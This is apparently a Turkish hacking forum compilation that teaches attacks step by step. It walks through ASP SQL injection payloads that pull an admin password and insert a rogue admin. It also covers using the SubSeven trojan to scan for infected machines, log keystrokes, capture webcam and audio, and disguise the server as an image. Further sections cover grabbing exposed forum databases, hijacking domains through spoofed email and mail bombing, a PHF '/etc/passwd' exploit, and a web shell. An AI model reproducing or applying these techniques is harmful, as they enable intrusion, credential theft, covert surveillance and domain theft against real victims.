dosya : port Pcp File Send: Dosya yollamak iin. Unused (sol) a dosya adi unused (sag) hedef dosya : port Bo Client Bunlarin disinda boclient.exe adli dosya ile de baglanabiliriz

ASP SQL ENJEKSIYON


ASP Sql Enjeksiyon a gemeden nce bir ka temel kavrama bakalim; Database = Veritabani Nedir : Veritabani verilerimizin dzenli olarak saklandigi dijital bir ortamdir. Verilerimizi anlamli kilmak da bizim bilfimizi olusturur. Veritabani Programlari: Gnmzde, birok firmanin rettigi db programlari mevcuttur... Ama bunlarin en bilinenleri ORACLE , SQL SERVER, MS ACCESS, FOX PRO'dur.

SQL Nedir :

Sql (Structured Query Language) bir veritabani dilidir.Uygulama gelistiriciler, bir veritabanina yeni tablo veya veri eklerken, silerken veya bir veriyi ararken bu dili kullanirlar. Bu anlamda genis kabul grms bir standarttir. rnegin MS ACCESS'te bunu yapmanin baska yntemleri de olsa, sonuta Sql karsiligi her zaman vardir. rnek bir Sql ifadesi yazalim; diyelim ki xchatx tablosundan Hack isimli dkmanin fiyatini bize bulsun :) Sql da sorgulamalar SELECT ile yapilir Bu sorgu yazilisi ;

SELECT fiyat FROM xchatx WHERE dokuman ismi="hack"

SELECT deyiminden sonraki gelen ilk ifade, sorgunun sonundaki WHERE kriterine gre tespit edilen kriterlerin hangi alanlarinin grntlenecegi bilgisidir. FROM deyiminden sonraki ifade, sorgulkamanin hangi tablodan yapilacagini bildirir. WHERE deyimi ise , sorgulamanin hangi kriter ya da kriterlere gre yapilacagini belirtmemizi saglar.

Iste SQL ENJEKSIYON DA ILK BASTA SITENIN DB sindeki TABLO Ismini bilmemiz gerekmez mi sizce yoksa SELECT WHERE Falan nasi kullanalim o nedenle SqL a ilk basta hata verdirip Tablo ismini grenmeliyiz.

SQL Hata verdirtmek iin sunlar yapilabilir:

Asp sql enjeksiyondan bahsedecegim

Asp sitemizin tabiki db si ve sql si olan :) search engine ya da login barina :

Bunu yaziyoruz :) Egeeer :

Microsoft OLE DB Provider for ODBC Drivers error 80040e07

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value xchatx1 to a column of data type int.

/index.asp, line 29 Burda illa da line 29 ve index.asp olmak zorunda degil tipa tip aynisi olmayacak elbette sadece Sytntax error oracle falan ikmasi lazim... Baska trl de sql a hata verdirebilirsiniz :

or 1=1--

" or 1=1--

or a=a

or 1=1--

) or (a=a

" or "a"="a Bunlari da aynene deneyin ... simdi o hatayi aldik da ne oldu diyorsaniz orda TABLE ismini grendik :) xchatx1 table namemimiz.

Simdi burdan diger tablolarinda ismini grenmemiz lazim...

SELECT* FROM xchatx1 WHERE dokumanID= or 1=1--

Burda yaptigimiz sey bize xchatx1 table inda dokumanIDsi bos olan seyi getir ya da 1=1 degerine uyan tabloyu getir dedik burda feyk attik SQL a yani. Burdan diger table isimlerini de greniriz. Sonra istedigimiz seyi SELECT WHERE deyimlerini kullanarak getiririz. nmze...

Simdi rnek bi saldiri yapalim ve yeni seyler grenelim biraz daha :

ilk nce kurban siteyi setik....

Baktik sql aigi da var bu isaret ile test ettik aik var yani.

http://http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

UNION SQL a birden ok soru sormak iin kullandik.

INFORMATION_SCHEMA.TABLES-- ise hi table ismi bilmedigimiz iin yazdik

Top 1 table_name ise en stteki tablo anlamina geliyor.

Microsoft OLE DB Provider for ODBC Drivers error 80040e07 [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value serles to a column of data type int. /index.asp, line 23 Hatamizi aldik :) Top 1 table_name serles mis!!

Simdi isimize yarayacak tablelari grenelim mesela admin table larini burda da LIKE deyimini kullanicaz iinde admin geen kelimeleri getir bize SQL!!! dicez :)

http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE % 25admin%25--

Hatayi aliyoruz :

Microsoft OLE DB Provider for ODBC Drivers error 80040e07 [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value admins to a column of data type int. /index.asp, line 3

Burda admin diye baslayan admins diye bir table var. Simdi bu admins table inin column yani sutnlarini grenme zamani!

Kodu yaziyoruz : http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME LIKE = admins-Burada da INFORMATION_SCHEMA.TABLES yerine INFORMATION_SCHEMA.COLUMNS deyimini yazdik. Yani yine feyk attik sqle, o da bu feykimizi yedi:

Hatayi alalim :

Microsoft OLE DB Provider for ODBC Drivers error 80040e07 [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value logonID to a column of data type int. /index.asp, line 22 ilk kolum LogonID ikti :) Simdi 2. stn istiyoruz : http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=admins WHERE COLUMN_NAME NOT IN (logonID)-Burda en tepede olan ama LogonID olmayani istedik ve hatayi grelim: Microsoft OLE DB Provider for ODBC Drivers error 80040e07 [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value logs to a column of data type int.

grendik adi logs. Artik sifre neredeyse geliyor kucagimiza :) nce Password ve detaillarina bakicaz. http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=admins WHERE COLUMN_NAME NOT IN (logonID,logs,password,details)-Hata : Microsoft OLE DB Provider for ODBC Drivers error 80040e14 [Microsoft][ODBC sql Server Driver][sql Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. /index.asp, line 4 iki stn var sansimiza gvenelim ilk logonu deneyelim : http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 logon FROM admins-admins table indaki logon stunundaki ilk ini seiyoruz. Microsoft OLE DB Provider for ODBC Drivers error 80040e07 [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value xrealcrack to a column of data type int. /index.asp, line 7 ve admin nick geldi. xrealcrack isimli kullanicinin sifresini ver bize SQL :) : http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 password FROM admins where logon= xrealcrack -Microsoft OLE DB Provider for ODBC Drivers error 80040e07 [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value albert8387vsc to a column of data

type int. /index.asp, line 4 Sifremizi aldik albert8387vsc :) ok artik hackledik.. Kendimiz de kullanici yaratabiliriz admins table inda logon column nde :) Kodu : http://www.siteadi.org/index.asp?catid=3; INSERT INTO admins (logonID, logon, password, details) VALUES (223,SwmeRt,123456,NA)-SwmeRt nickli bi admin olusturduk sifresi de : 123456 iste bu kadar...

Subseven programnn zellikleri (BURCU.JPG yi tklamayn. NK O KARI TARAFA GNDERECENZ TROJANDIR)

AYRICA PRG DE HACK PRG S OLDUU N TROJANLIDIR. AMA SZ SAKIN BURCU.JPG YE TIKLAMYIN. NK O BR EXE DOSYASIDIR. ADINI VE UZANTISINI DMAN ANLAMASIN VE ASIN DYE DETRLMTR (BU ARADA BURCU'DA BENM subseven.exe acyoruz aclan mende connection u secip ip scanner i tklyoruz Start ipi ve end ip ksmlarna aratlcak ipleri giriyoruz (nternet servis saglayclarn ip leri daha iyi sonuc verir) Port ksmnada subseven default portu olan 27374 portunu giriyoruz . Delay saysn arttrarak daha genis ve detayl bir arama yapar fakat yavas arayacaktr . Arama islemi yaparken subseven trojan bulasms bilgisayarlarn ip adreslerini buldugunu gorursunuz!

Buldugunuz ip leri uin/ip ksmna yazyoruz Connect dedigimiz anda karsmza sifre menusu ckyorsa sizden once birisi girmis demektir. Yada alt tarafta satrda Connected 21:25.21,Kasm 19, 2000, Pazar, version: BoNuS 2.1 gibi bir mesajla karslasrsanz sanslsnz baglandnz demektir. CONNECTION get pc info : Kurban bilgisayar hakknda bilgi alabilirsiniz. Cleant connection kurban bilgisayarnda kac kisi oldugunu gosterir(eger 2 ise sizden baska birileri daha var demektir) get home info: Kendi bilgisayarnz hakknda bilgi verir. server options: Server ayarlarn degistirebilirsiniz . Port degistirebilirsiniz Change port , Portu default port olarak ayarlayabilirsiniz Set default password , server'e sifre koyabilir Set password sifreyi silebilir Remove password , internet baglantsn koparabilir Disconnect server , serveri yeniden baslatabilir Restart server , serveri bilgisayar kapatlnca yeniden aclacak seklde aclmasn saglatabilir Close server yada yeni surumleri ile update etmek icin update server from local file / URL file kullanabiliriz .. ip notify : Bu bolumde yaplan ayarlar ile kurbann internete girmesi ile icq Mrc ve mail yolu ile size kurban bilgilerini otomatik yollamasn saglayabilirsiniz .

KEY / MESSAGE key logger : Kurbann klavyesinde yazdg her seyi buradan grebilirsiniz chat : kurban ile bire bir chat yapmanizi saglar matrix : matrix aktif hale getirdiginizde kurban bilgisayarn tamamen kaplayan bir goruntu ile chat yapmanz saglar msg manager : Buradan victim n bilgisayar ekrannda kacak deiik mesaj ayarlar yapabilirsiniz. Yaratclk size kalm .

spy : cq, Aol, Msn ve yahoo mesanger gibi chat programlarndan gelen mesajlar goreblmenizi saglar icq takeover : kurbann bilgisayarnda kaytl bulunan icq uin numaralarn kendi bilgisayarnza download etmenizi saglar daha sonro icq yu kurbann ad altnda acn ve daha once yazdklarn da goreblrsiniz ADVENCED ftp:/http : kurban bilgisayarna subseven kullanmadan da girebilirsiniz find files : Kurban bilgisayarnda dosya aramaya yarar. password : kurban bilgisayarndaki bir cok sifreyi goruntuler regedit : kurban bilgisayarnda ki registry editorunu acp degisiklikler yapabilirsiniz app redirect : cesitli dos komutlarini kurban bilgisayarinda calistrabilirsiniz port redict : ack olan portlarn gorup bunlara ekleme ve ckarma yapabilirsiniz

MISCELLANEOUS file manager : kurbann harddiskini goruntuler kendi harddiskiniz gibi kullanmay saglayan ozellkler icerir. window manager : windows altnda calsan programlar gorup bunlarla oynama yapabilirsiniz text-2-speech : kutucuga yazdgnz yazlar kurban belgsayarnda sesli olarak ckmasn saglar. Tabiki kendi bilgisayarinizda ykl olmas gerekli (bkz download bolumune) clipboard manager : su anda calsmakta olan programlar gorup kapatmanz saglar. irc bot : kurban internete girdigi anda haberi olmadan server kenini bir IRC kanalna bot olarak sokar (ip ve port numaras bulmak icin )

FUN MANAGER desktop/webcam : Kurban bilgisayarnn ekran goruntulerini alabilirsiniz full screen capture bir defalk tam ekran goruntusu alr open screen prewiev Zipli dosya iinde 3 exe dosyas birlikte gelecektir. Bunlar Subseven.exe Editserver.exe ve server.exe dir. (Server.exe yi tklamayn) subseven.exe acyoruz aclan mende connection u secip ip scanner i tklyoruz Start ipi ve end ip ksmlarna aratlcak ipleri giriyoruz (nternet servis saglayclarn ip leri daha iyi sonuc verir) Port ksmnada subseven default portu olan 27374 portunu giriyoruz . Delay saysn arttrarak daha genis ve detayl bir arama yapar fakat yavas arayacaktr . Arama islemi yaparken

subseven trojan bulasms bilgisayarlarn ip adreslerini buldugunu gorursunuz! Buldugunuz ip leri uin/ip ksmna yazyoruz Connect dedigimiz anda karsmza sifre menusu ckyorsa sizden once birisi girmis demektir. Yada alt tarafta satrda Connected 21:25.21,Kasm 19, 2000, Pazar, version: BoNuS 2.1 gibi bir mesajla karslasrsanz sanslsnz baglandnz demektir. CONNECTION get pc info : Kurban bilgisayar hakknda bilgi alabilirsiniz. Cleant connection kurban bilgisayarnda kac kisi oldugunu gosterir(eger 2 ise sizden baska birileri daha var demektir) get home info: Kendi bilgisayarnz hakknda bilgi verir. server options: Server ayarlarn degistirebilirsiniz . Port degistirebilirsiniz Change port , Portu default port olarak ayarlayabilirsiniz Set default password , server'e sifre koyabilir Set password sifreyi silebilir Remove password , internet baglantsn koparabilir Disconnect server , serveri yeniden baslatabilir Restart server , serveri bilgisayar kapatlnca yeniden aclacak seklde aclmasn saglatabilir Close server yada yeni surumleri ile update etmek icin update server from local file / URL file kullanabiliriz .. ip notify : Bu bolumde yaplan ayarlar ile kurbann internete girmesi ile icq Mrc ve mail yolu ile size kurban bilgilerini otomatik yollamasn saglayabilirsiniz . KEY / MESSAGE key logger : Kurbann klavyesinde yazdg her seyi buradan grebilirsiniz chat : kurban ile bire bir chat yapmanizi saglar matrix : matrix aktif hale getirdiginizde kurban bilgisayarn tamamen kaplayan bir goruntu ile chat yapmanz saglar msg manager : Buradan victim n bilgisayar ekrannda kacak deiik mesaj ayarlar yapabilirsiniz. Yaratclk size kalm . spy : cq, Aol, Msn ve yahoo mesanger gibi chat programlarndan gelen mesajlar goreblmenizi saglar icq takeover : kurbann bilgisayarnda kaytl bulunan icq uin numaralarn kendi bilgisayarnza download etmenizi saglar daha sonro icq yu kurbann ad altnda acn ve daha once yazdklarn da goreblrsiniz ADVENCED ftp:/http : kurban bilgisayarna subseven kullanmadan da girebilirsiniz

find files : Kurban bilgisayarnda dosya aramaya yarar. password : kurban bilgisayarndaki bir cok sifreyi goruntuler regedit : kurban bilgisayarnda ki registry editorunu acp degisiklikler yapabilirsiniz app redirect : cesitli dos komutlarini kurban bilgisayarinda calistrabilirsiniz port redict : ack olan portlarn gorup bunlara ekleme ve ckarma yapabilirsiniz MISCELLANEOUS file manager : kurbann harddiskini goruntuler kendi harddiskiniz gibi kullanmay saglayan ozellkler icerir. window manager : windows altnda calsan programlar gorup bunlarla oynama yapabilirsiniz text-2-speech : kutucuga yazdgnz yazlar kurban belgsayarnda sesli olarak ckmasn saglar. Tabiki kendi bilgisayarinizda ykl olmas gerekli (bkz download bolumune) clipboard manager : su anda calsmakta olan programlar gorup kapatmanz saglar. irc bot : kurban internete girdigi anda haberi olmadan server kenini bir IRC kanalna bot olarak sokar (ip ve port numaras bulmak icin ) FUN MANAGER desktop/webcam : Kurban bilgisayarnn ekran goruntulerini alabilirsiniz full screen capture bir defalk tam ekran goruntusu alr open screen prewiev kendi belirleyeceginiz aralklarla ekran goruntusu alr ayrca bu goruntuyu ne kadar buyutursenz goruntu kaltes o kadar netlesr . assagda bulunan allow mouse clicks kutucugunuda isaretlersek bize gelen resim uzerinde yaptgmz degsklkler kurban blgsayarnada yansyacaktr. webcam/quickcam capture : kurban bilgisayarnda web camera varsa onun ve bulundugu bolgenn goruntulerini alabilirsiniz print : yazcsndan herhang bir ckt alabilirsiniz browser : herhangi bir url adresini yazarak ekran uzerine aclmasn saglayabilirsiniz resolution : ekran cozunurlugu ile oynamalar yapabilirsiniz. win colors :windows renkelrini degistirebilirsiniz . EXTRA FUN screen savers : ekran koruyucuyu degstreblrsnz

restart windows : windows u cestli sekillerde kapatabilirsiniz mouse : mouse ayarlar ile oynayabilirsiniz sound : kurbann odasnda ses kayd yapabilirsiniz time/date : tarih ve saat ayarlarn degstrebilirsiniz extra : cesitli ozellikler olan bir bolum montor cd room gibi cihazlari acma kapama gibi LOCAL OPTIONS quality : capture ayarlamalari icin local folder : Karsi bilgisayardan download edilenlerin bulundugu klasor skins : subseven programnzn on plann tamamen degistirebilirsiniz misc options : ? advenced : port numaralar (matrix key logger spy port) run editserver : server n edit edilebilmesini saglayan program acar Subseven Editserver STARTUP METHOD Subseven programnn kendini yazacag windows yerin ayarlanmas Registery Run Registery Runservis Key Name ( Verilecek dosya ismi ) WIN.INI Less know method ( Az bilinen yontem ) Not know method ( Bilinmeyen yontem ) NOTIFICATION OPTIONS Victim Name ( kurban ismi ) Enable icq notify to UIN ( Kurbannn nete girince haber verilecek ICQ numaras ) Enable IRC Notify (Kurbann Nete grnce bot olarak grecegi IRC kanal ) E-mail Notify ( E-mail yoluyla haber verlen yontem ) INSTALLATION Automatically start server on port ( 27374 default porttur kendi port numaranz da yazabilirsiniz) Use random port ( Her zaman farkl bir port acp haber verir)

Server Password ( server sifresi ) Protect server and port and password ( server uzernde degisiklik yapmay engeller ) Enable IRC BOT SETTINGS ( Kurbann bot olarak dsmesi istenilen IRC kanal ayarlar) Server : irc.subsever.com Port : 6667 Nickname : kurban bot password : Prefix :@ channal to join : channal key : Melt server installation ( Kurban server tklaynca kendi kendini silmesi icin ) Enable fake error ( Degisik hatamesajlari vermek icin ) Bind server whith EXE files ( server exe nin dikkat cekmemesi baska bir dosya ile birlestirmek icin ) PROTECT SERVER Protect the server so it can't be edited/changed (server ozellikleri degismesi icin sifre sorar ) Save new setting Save new copy of the server with the new setting ( hazrlanan server kopyalamak ve ckmak icin kullanlr ) Quith withouth saving ( kaydetmeden ck )

PROGRAMI NDRMEK N TIKLAYIN RAR FRES : www.pcdg.org KOLAY GELSN HACKER PROGRAMLARININ YAYINLANIP YAYINLANMADIGI HAKKINDA BR BLGM OLMADIGI N TERETTR NDE YAYINLIYORUM BU PROGRAMI UMARIM OK NZ YARAYACAK... EGER BYLE PROGRAMLAR YAYINLANMIYORSA BR BEN UYARSIN Y GNLER DLERM

Web Hack Yntemleri

1-Bu olay herkez yapabilir ok basit bir yntem, bu yntemle geen haftalarda 400 e yakn yesi olan bir forum u hackledim. En ok kullanlan 2 forum tr vardr biri Snitz dieri ise Web Wiz Guide forum lardr. color=#800080 www.google.com dan bu isimleri aratyorsunuz orda size yzlerce forum kar (Web Wiz forum olarak aratn) rnein color=#0000ff www.ahmetyigit.com/forum adresinin google dan buldunuz ve siteye girdiniz eer Snitz forum ise sonuna unlar ekleyin /snitz_forums_2000.mdb <eer adam mdb dosyasnn yerini deitirmeden sitesine attysa btn kullanc isimleri ve ifrelerini grebilirsiniz>daha sonra karnza bu dosyay yklemek istiyormusunuz diye biey gelicek kaydet diyin ye dosyay ykleyin. Daha sonra bilgisayarnzda Microsoft Access varsa bu dosyay ap o forum un btn ifrelerinin ele geirebilirsiniz. Geirdiiniz ifreler arasnda admin ifreside bulunmaktadr bu sayede forum un ortasna hacked by .... yaza bilirsiniz. Yanlz bu olay btn forumlarda olmamaktadr. 1-Google dan Sntiz forum diye arattnz sitelerin sonuna "/snitz_forums_2000.mdb" yi ekleyin rnein color=#0000ff www.ahmetyigit.com/forum/snitz_forums_2000.mdb 2-Google dan Web Wiz Guide forum diye aratnz sitelerin sonuna "/admin/wwForum.mdb" yi ekleyin rnein color=#0000ff www.ahmetyigit.com/forum/admin/wwForum.mdb aln imdi bir site bunu hacklemenize gerek yok nk biey yapmam color=#0000ff http://www.mursal.com/mursalforum/forum bunu ekleyin /admin/wwForum.mdb NOT: Bu BLNEN kolay bir hack yntemidir.

2- Bu teknik Internicin yeterli gvenlii salayamamas nedeniyle ortaya kyor. .com .net .org .gov .mil uzantl domainlerde etkili olunabiliyor. Web sayfas zerinden bir ka mail alverii sayesinde bir domain ad geici bir srede olsa sizin adnza geiyor yada kullanlmaz hale geliyor. Required ingredients: * Mail adresini saklayp baka birisinin mailiymi gibi gsterebileceiniz bir anonymousmailer yada mailbomber program.. * Maillerinizle kandrabilme zellii. Yeterli Ingilizce. * Herhangi bir Fake mail adresi. (Mail adresini kullanabiliyor olun mutlaka. Free servislerde birinden aln.) Exploit: imdi rnek olarak biz Example.org adl adresi alacaz. http://www.networksolutions.com/ adresine gidin. Who is yazan linke tklayarak domain adresimizi girelim ve bu domain ile ilgili bilgilere ulaalm. Aadaki gibi bir tablo kacaktr. Registrant: Example (ex24-DOM) Address details Domain Name: EXAMPLE.ORG Administrative Contact, Technical Contact, Zone Contact, Billing Contact: DOMAIN, ADMIN (ADM001) ADMINEMAIL@EXAMPLE.COM Record last updated on 00-Jan-2000. Record created on 00-Jan-2000. Database last updated on 3-Feb-2000 14:29:53 EST. Domain servers in listed order: NS1.EXAMPLE.COM 1.2.3.4 NS2.EXAMPLE.NET 1.2.3.5

imdi ki seeneimiz var: 1) Domain in tm kontroln Administrator olarak elimize alr ve deiiklik yapabiliriz. 2) Yada size ait olan bir web sunucusuna geri alnana kadar ynlendirebiliriz. lk Saldr ekli. Internic Authentication ilemi iin Domain sahibinin gerekten siz olup olmadna bakmaz. Deiiklik sonras Onay (Confirm) mailinin hangi adresten geldiini kontrol eder. Yani Domain iin deiiklik yapnca size bir onay maili gelir. Bu mail Domain sahibinin adresine gelir. Mesela rneimizde ADMINEMAIL@EXAMPLE.COM adresine gelecektir. Yani bizde onay mailini sanki bu adresten geliyormu gibi gstermeliyizki domain deiikliimiz kabul edilsin. Adm adm ilemler. - Network Solutions adresine gidelim. - Make Change linkine tklayn. - DOmain Name giriini yapn. ( example.org gibi) - ki mavi buton greceksiniz - Expert yazl olana tklayn - Sonraki ekranda 'Select the form that meets your needs' balkl bri sayfa gelecek - Contact Form linkine tklayn - ki tane bilgi girii iin text box greceksiniz. - Birinci kutucua ADMIN yneticisin girin. (example.org iin ADM001) - kinci kutucua domain sahibinin mail adresini yazn. (example.org iin ADMINEMAIL@EXAMPLE.com) - Modify seeneini sein. - imdi Proceed to Contact Information penceresi gelecek - MAIL-FORM seeneini sein ve 'Go on to Contact Data Information' dmesine basn. - imdi Admin ile ilgili btn bilgiler karnza gelecektir. - Mail alanna gidin ve sizin Fake mail adresinizi yazn.phyton@hotmail.com - imdi 'Proceed to Set Authorization Scheme' seeneini sein - Tekrar MAIL-FORM seip admin mail adresini girin (ADMINDEMAIL@EXAMPLE.COM) - Alttaki Seenei No olarak iaretleyin ve Generate Contact Form sein - imdi Aadaki Mail ablonuna bakn. Versiyon Numarasn Deitirmeyin Contact Version Number: 1.0 Detaylar web sayfasndan alp yazn Authorization 0a. (N)ew (M)odify (D)elete.: Modify 0b. Auth Scheme.............: MAIL-FROM 0c. Auth Info...............: Contact Information 1a. NIC Handle..............: ADM001 1b. (I)ndividual (R)ole.....: Individual 1c. Name....................: DOMAIN, ADMIN 1d. Organization Name.......: EXAMPLE 1e. Street Address..........: 1f. City....................: 1g. State...................: 1h. Postal Code.............: 1i. Country.................: 1j. Phone Number............: 1k. Fax Number..............: 1l. E-Mailbox...............: evil@domain.com

Notify Information 2a. Notify Updates..........: AFTER-UPDATE 2b. Notify Use..............: AFTER-USE Authentication 3a. Auth Scheme.............: MAIL-FROM 3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM 3c. Public (Y/N)............: NO NOTE: Aada 'Mail this contact form to me!' yazl butona basmayn. imdi bu yazy kopyalayn ve Anonymous Remalerinize yaptrn. imdi zor ksmna geldik. Siz bu maili yolladnzda (Adminin mail adresinden spoof yaparak tabiki) ADMIN mailine hostmaster@networksolutions.com adresinden bir confrim maili gelecektir. rnek: Subject: [NIC-000128.4r50] Your Mail This is an automatic reply to acknowledge that your message has been received by hostmaster@networksolutions.com. This acknowledgement is "NOT" a confirmation that your request has been processed. You will be notified when it has been completed. If you should have need to correspond with us regarding this request, please include the tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply to this message. If you have not already done so, please come and visit our site via www browser or ftp and pick-up the latest domain template or review the Domain Name Registration Service Agreement at the URL's: Domain Name Registration Service Agreement http://www.networksolutions.com/leg...-agreement.html Domain Name Registration Template ftp://www.networksolutions.com/temp...in-template.txt Regards, Network Solutions Registration Services IMPORTANT INFORMATION On January 15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All versions of the Service Agreement template will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement, Version 6.0 template located at ftp://www.networksolutions.com/temp...in-template.txt for all template requests. The terms and conditions of the Service Agreement are available on our Web site at: http://www.networksolutions.com/leg...-agreement.html. The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at 5:00 kfr yasak and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours. Should you wish to modify or delete an existing domain name registration, you can do so

online, using our Service Agreement. You can change the registrant's address, replace a contact/agent with a different contact/agent, or change primary and/or secondary name server information. To update information about an existing contact, such as postal address, e-mail address or telephone number, complete and submit the Contact Form to hostmaster@internic.net. This form is available on our Web site at www.networksolutions.com To register or update information about a name server, complete and submit the Host Form to hostmaster@internic.net. This form is also available on our Web site. Network Solutions Registration Services e-mail: help@networksolutions.com Bu mesaj domain sahibi alrsa kolayca fark edecektir olay. Bu yzden mail bomberinizle 20-30 tane bu tarz mail yollayn. 35 tane ayn adresten mail geldiini grnce kar taraf silecektir. Mail bomberinize Tracking numarasn ayn girmeyin. Mesela [NIC000128.4r50] eklinde deiken numaralar kullann. Mail adresinin Body sindeki numaray da deitirmeyi unutmayn. Bylece kurban hangi maile cevap vereceini bilemeyecek bunun bir saldr olduunu dnecektir. Bunu byle dnmesi iinde nuamralamad aadaki sralamaya benzer bir sralama kullann. [NIC-000127.5089] [NIC-000128.4rg7] [NIC-000128.523f] [NIC-000127.53d0] [NIC-000129.r609] [NIC-000128.3f6y] [NIC-000128.5d8t] [NIC-000127.r509] [NIC-000128.4r30] [NIC-000127.d307] admin@example.com adresine hostmaster@internic.net adresinden gelen mailler atn. Mesaj az cenki ile ayn konu ve gvde de olacak. 10 15 tane mail atn. imdi Fake mailimize geldi Remailer ile Adminemail@example.com adresinden geliyormu gibi gstererek hostmaster@networksolutions.com adresine aada ablonu olan mailden bir tane yollayn. Version numarasn deitirmeyin Contact Version Number: 1.0 Detaylar kendinize gre deitirin Authorization 0a. (N)ew (M)odify (D)elete.: Modify 0b. Auth Scheme.............: MAIL-FROM 0c. Auth Info...............: Contact Information 1a. NIC Handle..............: ADM001 1b. (I)ndividual (R)ole.....: Individual 1c. Name....................: DOMAIN, ADMIN 1d. Organization Name.......: EXAMPLE 1e. Street Address..........: 1f. City....................: 1g. State...................:

1h. Postal Code.............: 1i. Country.................: 1j. Phone Number............: 1k. Fax Number..............: 1l. E-Mailbox...............: evil@domain.com Notify Information 2a. Notify Updates..........: AFTER-UPDATE 2b. Notify Use..............: AFTER-USE Authentication 3a. Auth Scheme.............: MAIL-FROM 3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM 3c. Public (Y/N)............: NO NOTE: Konu ksmn kesinlikle bo brakn. Sadece bir tane yollayn hostmaster@networksolutions.com adresine. Sonra tekrar adminemail@example.com adresini mail bombaredmanna tutun. Tracking Nuamrasn deitirmeyi unutmayn. 35 tane kadar atn mail. 24 Saat iinde admin ayarlar deiecek ve yeni admin siz olacaksnz. 3- imdi web hacking olay Hack olaynn en akl isteyen ksmdr. imdiden sylyorum aranzda bu ilerden anlamayan veya kafas bu tarz ilere basmayanlar varsa bu yazy okuyupta vaktini boa harcamasn. Bu ilerde yetenii olan kiiler yanlzca web hacking yapabilir. Gerisi avcunu yalar. Olaya giriyorum. imdi en nce olay mantk ve felsefe snrlarna oturtalm. Bu benim kendi felsefem. Felsefem ise u: Bir sistemin nasl altn bilmeden, o sistemi kramazsn! Bunu bir dier anlamda aklarsak bir sistemin arkasn grmeden onu nden kertemezsin. Peki ne bu? mesela senin bir web siten yok! Ama web hacking yapmak istiyorsun mmkn m? Hayr deil! Nasl ilediini bilmediin bireye zarar veremezsin. Peki yntemler neler. Herkezin yapaca basit yntemler var bata. Mesela Brute Force, Dict Attack falan. Bunlar yapmak iin nerdeyse web bilmeye bile gerek yok. Sadece FTP bil yeter. Tabii bunlar Lamerlara gre eyler, biz olay atmz iin fazla bilgi isteyen eyleri yapcaz. En nce bir sisteme girmek iin ak olmas gerekli ki aktan dalalm. Nasl aklar olabilir bunlar, mesela bir script a PHF gibi. PHF kullanan sitelere unu yazarsak bize ifrelerin bulunduu yer gzkr /cgi-bin/phf?Qalias=x%0a/bin/cat %20/etc/passwd . Ne bu? Ak tabii ki. ou site yama**tr imdi ama bu bir ak. Nasl bulunur? Script yazmay bilenler bunu bulur. Kaynak koda bakarsn, ak olduunu ileyi tarzndan anlarsn ite YOL! Burdan ifreleri alrsn bazlar Shadowed falan olur, bazlarn krmak gerekir falan Cracker Jack tarz programlarla krarsn olur biter. imdi bu bir yntemdi ama bakalarda var hatta hayal bile edilmemileri var bu ilerde. Mesela dier bir yntem, Commander.PL. imdi diyeceksiniz ne bu? Bu commander.pl upload edildii UNIX makinalara CHMOD 777 ve 755 sayesinde istediiniz komutu girmenizi salayan birey. Mesela benim hostingimi ****************** salyor ve site ad *********.com. imdi bana ayrlan subdomain olan spmaster a ben bunlar upload edip altrsam, ftp ile yetkimin olmad dosyalara ular istediimi silerim falan! Anladnz m? Bakn ne kadar basit! Gidin bunu bele yer veren yerlere yapn bakalm imdi.

Dier bir yntem derim ama o kadar okki. Zaten bu yazy okuyorsanz ya kendinizi gelitirmek istiyorsunuzdur yada bunu renmek istiyorsunuzdur. Syliyim imdiden ikinci seenektekiler iin zgnm... imdi benim bulduum bir yntem! Bunu akla**yacaktm nk sonuta bahsediceim ahs benim sitemin bir ziyaretisi. Ondan ok zr diliyorum bunu anlattm iin ama merak etmesin bu yazy okuyanlarn %99 u sana zarar verebilecek kadar bu ileri iyi bilmiyor. O yzden sanyorum sakncas olmayacaktr. imdi balym, Panick bana jayjay diye bir dostunun olduunu syledi, bende baktm bize ye olmu site ksmndada TYMSAH.COM yazyor. Merak ettim siteye gittim. Bir baktm ki onlarda bizim formumumuz olan IKONBOARD un aynsn kullanyor. Neyse baktm tymsah benim trkeletirmedii yerleri de trkeletirmi forumun. Bende benim forumdan ve onun forumdan ona PM attm ve bu dosyalar istedim. Bana vereceini syledi, aradan vakit geti dosyalar alamadm nk tymsah sanyorum ki evinde deilmi ehir dndaym. Bende baktm olmuyor bekle bekle, Allah'a kr bu ilerden anladm iin hemen yapmam gerekeni yaptm ve onun bana yollayaca dosyalar kendim aldn nasl m? Ben ikonboard'un dil dosyalarn falan nereye kurduunu biliyorum. Yani tm klasrlerin nerede ve hangi isimle olduunu biliyorum. nk bende ikonboard kullanyorum. Bende madem yle dedim, ve forumun dil dosyalarn indirmeye baladm yaptm u idi. Mesela hata mesajlarn bulunduran dil dosyasn istiyorsam 